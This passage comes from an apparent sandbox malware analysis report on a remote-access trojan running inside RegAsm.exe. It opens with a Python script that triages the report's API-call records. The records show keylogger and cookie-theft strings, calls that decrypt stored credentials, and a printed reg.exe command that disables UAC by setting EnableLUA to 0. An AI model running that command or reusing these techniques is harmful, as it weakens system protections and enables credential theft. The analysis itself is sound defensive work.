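    """Parse one '• Api.MODULE(args), ref: addr' bullet; None if the line is not one."""
    m = API_LINE.match(line)
    if not m:
        return None
    args: List[Union[int, str]] = []
    # Joe prints each captured stack slot as 8-digit hex, '?' for unknown, or a
    # decoded string. The strings in this report contain no commas (assumption).
    for tok in m.group("args").split(","):
        tok = tok.strip()
        args.append(int(tok, 16) if HEX32.match(tok) else tok)
    return ApiCall(m.group("name"), m.group("module"), args, int(m.group("ref"), 16))


def decode_access(mask: int) -> List[str]:
    """Expand a service access mask into the winsvc.h right names it contains."""
    return [name for bit, name in SERVICE_ACCESS.items() if mask & bit]


def triage(lines: List[str]) -> List[str]:
    """Walk report lines and return one finding per call a reviewer should act on."""
    findings: List[str] = []
    for line in lines:
        call = parse_api_line(line)
        if call is None:
            continue
        # Any string argument carrying the EnableLUA=0 reg.exe command line.
        if any(isinstance(a, str) and UAC_OFF.search(a) for a in call.args):
            findings.append(f"{call.ref:08X}: {call.name} runs reg.exe to set EnableLUA=0 (UAC disabled)")
        # ControlService(hService, dwControl, ...): decode the control code.
        if call.name == "ControlService" and len(call.args) > 1 and isinstance(call.args[1], int):
            code = call.args[1]
            findings.append(f"{call.ref:08X}: ControlService code {code} = {SERVICE_CONTROL.get(code, 'unknown')}")
        # OpenServiceW(hSCManager, lpServiceName, dwDesiredAccess): decode the mask.
        if call.name == "OpenServiceW" and len(call.args) > 2 and isinstance(call.args[2], int):
            mask = call.args[2]
            rights = decode_access(mask) or ["(no service-specific rights)"]
            findings.append(f"{call.ref:08X}: OpenServiceW access 0x{mask:04X} = {'|'.join(rights)}")
    return findings


# Sample input copied verbatim from the function records in this report.
SAMPLE_LINES = [
    r"• OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB46",
    r"• OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB5A",
    r"• ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB76",
    r"• OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC5E",
    r"• ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC7A",
    r"• ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACE1",
    r"• CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004077D6",
    "Memory Dump Source",
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_LINES):
        print(finding)
```

Run against a saved copy of the report text, the script reduces the records to a handful of lines such as "0041AB76: ControlService code 1 = SERVICE_CONTROL_STOP" and "004077D6: CreateProcessA runs reg.exe to set EnableLUA=0 (UAC disabled)"; the 0x20/0x40 access masks requested in OpenServiceW line up with the stop and pause/continue controls sent immediately afterwards, which is the consistency check worth making before reporting the capability.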
                                                  Strings
                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 004076FF
                                                  • SG, xrefs: 00407715
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                  • API String ID: 0-643455097
                                                  • Opcode ID: 9875d9faf70918787a925bf8ffd0fe05ff0f1e0d4d07a7049234b56cd1ae4be9
                                                  • Instruction ID: 5ffff352cfcc2e87221e4fa572a01d73507d198e899e6baa5594ec663d9dd15d
                                                  • Opcode Fuzzy Hash: 9875d9faf70918787a925bf8ffd0fe05ff0f1e0d4d07a7049234b56cd1ae4be9
                                                  • Instruction Fuzzy Hash: 8DF02BB0E04600EBCB1477345D296AA3656A780397F40487BF507EB2F2EBBD5C41871E
                                                  APIs
                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 004433FA
                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,?,?,0044338B,?,?,0044332B,?), ref: 0044340D
                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 00443430
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                  • String ID: CorExitProcess$mscoree.dll
                                                  • API String ID: 4061214504-1276376045
                                                  • Opcode ID: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                                  • Instruction ID: d7bd46dfab834bb5d48edea7818df211002af85bf4a2e706b61bd78119be3437
                                                  • Opcode Fuzzy Hash: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                                  • Instruction Fuzzy Hash: 4EF04931900208FBDB159F65DC45B9EBF74EF04753F0040A5F805A2251DB758E40CA99
                                                  APIs
                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
                                                  • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
                                                  • CloseHandle.KERNEL32(?), ref: 00405140
                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                  • String ID: KeepAlive | Disabled
                                                  • API String ID: 2993684571-305739064
                                                  • Opcode ID: 1fd388f523b344ad3ce7bacd9f737274470046df98bc8577e1acfe76f453cfe4
                                                  • Instruction ID: dc79248355977efa3495ea8e96f68553e1f2867eb32bbe7dc6984d352a193ca4
                                                  • Opcode Fuzzy Hash: 1fd388f523b344ad3ce7bacd9f737274470046df98bc8577e1acfe76f453cfe4
                                                  • Instruction Fuzzy Hash: 5DF06D71904711BBDB203B758D0AAAB7E95AB06315F0009BEF982916E2D6798C408F9A
                                                  APIs
                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                  • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041AE83
                                                  • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE91
                                                  • Sleep.KERNEL32(00002710), ref: 0041AE98
                                                  • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AEA1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: PlaySound$HandleLocalModuleSleepTime
                                                  • String ID: Alarm triggered
                                                  • API String ID: 614609389-2816303416
                                                  • Opcode ID: 715f6b18c41aa76fa9a4930845716c072d9d24f9be949641e6571375284beb95
                                                  • Instruction ID: 264e31dd7f8ae4a58c3cd97330858728e5483d82e525179ed11d996d756d41c5
                                                  • Opcode Fuzzy Hash: 715f6b18c41aa76fa9a4930845716c072d9d24f9be949641e6571375284beb95
                                                  • Instruction Fuzzy Hash: 3EE0D826A40220779A10337B6D0FD6F3D29CAC3B2570100BFFA05660C2DD540C01C6FB
                                                  APIs
                                                  • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CE7E), ref: 0041CDF3
                                                  • GetConsoleScreenBufferInfo.KERNEL32 ref: 0041CE00
                                                  • SetConsoleTextAttribute.KERNEL32(00000000,0000000C), ref: 0041CE0D
                                                  • SetConsoleTextAttribute.KERNEL32(00000000,?), ref: 0041CE20
                                                  Strings
                                                  • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CE13
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                  • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                  • API String ID: 3024135584-2418719853
                                                  • Opcode ID: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                                  • Instruction ID: 3099d3b49c49d1df3d44327ff87017ee7d1b0803ff7cdb2815dc6b7c28d9377e
                                                  • Opcode Fuzzy Hash: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                                  • Instruction Fuzzy Hash: B6E04872504315E7E31027B5EC4DCAB7B7CE745613B100266FA16915D39A749C41C6B5
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 52d86c3ce57e0cfe0599c5a04198a87027602046587802b200418d3fba34e127
                                                  • Instruction ID: 15e211ccade7fc2a5debfa8ad78d9bfa955d5b29a73147504924d067d3782226
                                                  • Opcode Fuzzy Hash: 52d86c3ce57e0cfe0599c5a04198a87027602046587802b200418d3fba34e127
                                                  • Instruction Fuzzy Hash: 2771D4319012569BEB21CF55C884AFFBB75EF55310F19412BE815672A0DB78CCC1CBA8
                                                  APIs
                                                  • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                                  • _free.LIBCMT ref: 0044943D
                                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                  • _free.LIBCMT ref: 00449609
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                  • String ID:
                                                  • API String ID: 1286116820-0
                                                  • Opcode ID: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                                                  • Instruction ID: 45cf5ea20785abb2a7eec221213eb08c1b8584214e6df16efc40294c4842d026
                                                  • Opcode Fuzzy Hash: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                                                  • Instruction Fuzzy Hash: 1B51EC71900205ABEB14EF69DD819AFB7B8EF44724F20066FE418D3291EB789D41DB58
                                                  APIs
                                                    • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F956
                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 0040F97A
                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F989
                                                  • CloseHandle.KERNEL32(00000000), ref: 0040FB40
                                                    • Part of subcall function 0041C076: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F634,00000000,?,?,00475338), ref: 0041C08B
                                                    • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                    • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FB31
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                  • String ID:
                                                  • API String ID: 4269425633-0
                                                  • Opcode ID: 17d3ca1aae57d35aa737fa1fa062f2e108f84d872e45db2d654924eee4b7dbd7
                                                  • Instruction ID: d02cab962e177bd28921c4f9a71df23b762ba7d31cecf8da060328e0f3db66c6
                                                  • Opcode Fuzzy Hash: 17d3ca1aae57d35aa737fa1fa062f2e108f84d872e45db2d654924eee4b7dbd7
                                                  • Instruction Fuzzy Hash: 5F4136311083419BC325F722DC51AEFB3A5AF94305F50493EF58A921E2EF385A49C65A
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID:
                                                  • API String ID: 269201875-0
                                                  • Opcode ID: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                  • Instruction ID: bbec49e9ccdd5c2af131aecc9b6810ea24321c3eb42f74c08fbdd36582e243a3
                                                  • Opcode Fuzzy Hash: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                  • Instruction Fuzzy Hash: 5F41E232E00200AFEB14DF78C881A5EB3B5EF89B18F1545AEE915EB351D735AE05CB84
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92), ref: 004511F9
                                                  • __alloca_probe_16.LIBCMT ref: 00451231
                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?), ref: 00451282
                                                  • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?,00000002,00000000), ref: 00451294
                                                  • __freea.LIBCMT ref: 0045129D
                                                    • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                  • String ID:
                                                  • API String ID: 313313983-0
                                                  • Opcode ID: 695a5f3fdf384fa9d4863fe56c7c43b71593cfbe7e8d533d6dff3d4dffab5c55
                                                  • Instruction ID: f723c28c07ecd650b398e20bb728631ced1c531215915adb10fa1f31571a6cea
                                                  • Opcode Fuzzy Hash: 695a5f3fdf384fa9d4863fe56c7c43b71593cfbe7e8d533d6dff3d4dffab5c55
                                                  • Instruction Fuzzy Hash: F7310331A0020AABDF249F65DC41EAF7BA5EB04701F0445AAFC08E72A2E739CC55CB94
                                                  APIs
                                                  • GetEnvironmentStringsW.KERNEL32 ref: 0044F3E3
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F406
                                                    • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F42C
                                                  • _free.LIBCMT ref: 0044F43F
                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F44E
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                  • String ID:
                                                  APIs
                                                  • GetLastError.KERNEL32(?,00000000,00000000,0043BCD6,00000000,00000000,?,0043BD5A,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044831E
                                                  • _free.LIBCMT ref: 00448353
                                                  • _free.LIBCMT ref: 0044837A
                                                  • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448387
                                                  • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448390
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$_free
                                                  • String ID:
                                                  APIs
                                                  • _free.LIBCMT ref: 00450A54
                                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                  • _free.LIBCMT ref: 00450A66
                                                  • _free.LIBCMT ref: 00450A78
                                                  • _free.LIBCMT ref: 00450A8A
                                                  • _free.LIBCMT ref: 00450A9C
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  APIs
                                                  • _free.LIBCMT ref: 00444106
                                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                  • _free.LIBCMT ref: 00444118
                                                  • _free.LIBCMT ref: 0044412B
                                                  • _free.LIBCMT ref: 0044413C
                                                  • _free.LIBCMT ref: 0044414D
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  APIs
                                                  • _strpbrk.LIBCMT ref: 0044E7B8
                                                  • _free.LIBCMT ref: 0044E8D5
                                                    • Part of subcall function 0043BD68: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0043BD6A
                                                    • Part of subcall function 0043BD68: GetCurrentProcess.KERNEL32(C0000417,?,00405103), ref: 0043BD8C
                                                    • Part of subcall function 0043BD68: TerminateProcess.KERNEL32(00000000,?,00405103), ref: 0043BD93
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                  • String ID: *?$.
                                                  APIs
                                                  • GetKeyboardLayoutNameA.USER32(?), ref: 00409F0E
                                                    • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                                    • Part of subcall function 0041C5A6: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041C5BB
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateFileKeyboardLayoutNameconnectsend
                                                  • String ID: XQG$NG$PG
                                                  APIs
                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 00443515
                                                  • _free.LIBCMT ref: 004435E0
                                                  • _free.LIBCMT ref: 004435EA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$FileModuleName
                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                                    • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,636D1986,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                    • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5), ref: 004185B9
                                                    • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84), ref: 004185C2
                                                    • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                  • Sleep.KERNEL32(000000FA,00465E84), ref: 00404138
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                  • String ID: /sort "Visit Time" /stext "$0NG
                                                  APIs
                                                  • _wcslen.LIBCMT ref: 00416330
                                                    • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                    • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004), ref: 004138DB
                                                    • Part of subcall function 004138B2: RegCloseKey.ADVAPI32(004660B4), ref: 004138E6
                                                    • Part of subcall function 00409E1F: _wcslen.LIBCMT ref: 00409E38
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _wcslen$CloseCreateValue
                                                  • String ID: !D@$okmode$PG
                                                  APIs
                                                    • Part of subcall function 0040C4FE: PathFileExistsW.SHLWAPI(00000000), ref: 0040C531
                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040C658
                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040C6C3
                                                  Strings
                                                  • User Data\Profile ?\Network\Cookies, xrefs: 0040C670
                                                  • User Data\Default\Network\Cookies, xrefs: 0040C63E
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExistsFilePath
                                                  • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                  APIs
                                                    • Part of subcall function 0040C561: PathFileExistsW.SHLWAPI(00000000), ref: 0040C594
                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040C727
                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040C792
                                                  Strings
                                                  • User Data\Profile ?\Network\Cookies, xrefs: 0040C73F
                                                  • User Data\Default\Network\Cookies, xrefs: 0040C70D
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExistsFilePath
                                                  • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                  APIs
                                                  • GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                  • wsprintfW.USER32 ref: 0040B22E
                                                    • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: EventLocalTimewsprintf
                                                  • String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
                                                  APIs
                                                    • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                    • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000A2A2,?,00000000,00000000), ref: 0040AFA9
                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000A2C4,?,00000000,00000000), ref: 0040AFB5
                                                  • CreateThread.KERNEL32(00000000,00000000,0040A2D0,?,00000000,00000000), ref: 0040AFC1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateThread$LocalTime$wsprintf
                                                  • String ID: Online Keylogger Started
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(crypt32), ref: 00406ABD
                                                  • GetProcAddress.KERNEL32(00000000), ref: 00406AC4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: CryptUnprotectData$crypt32
                                                  APIs
                                                  • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                                  • CloseHandle.KERNEL32(?), ref: 004051CA
                                                  • SetEvent.KERNEL32(?), ref: 004051D9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
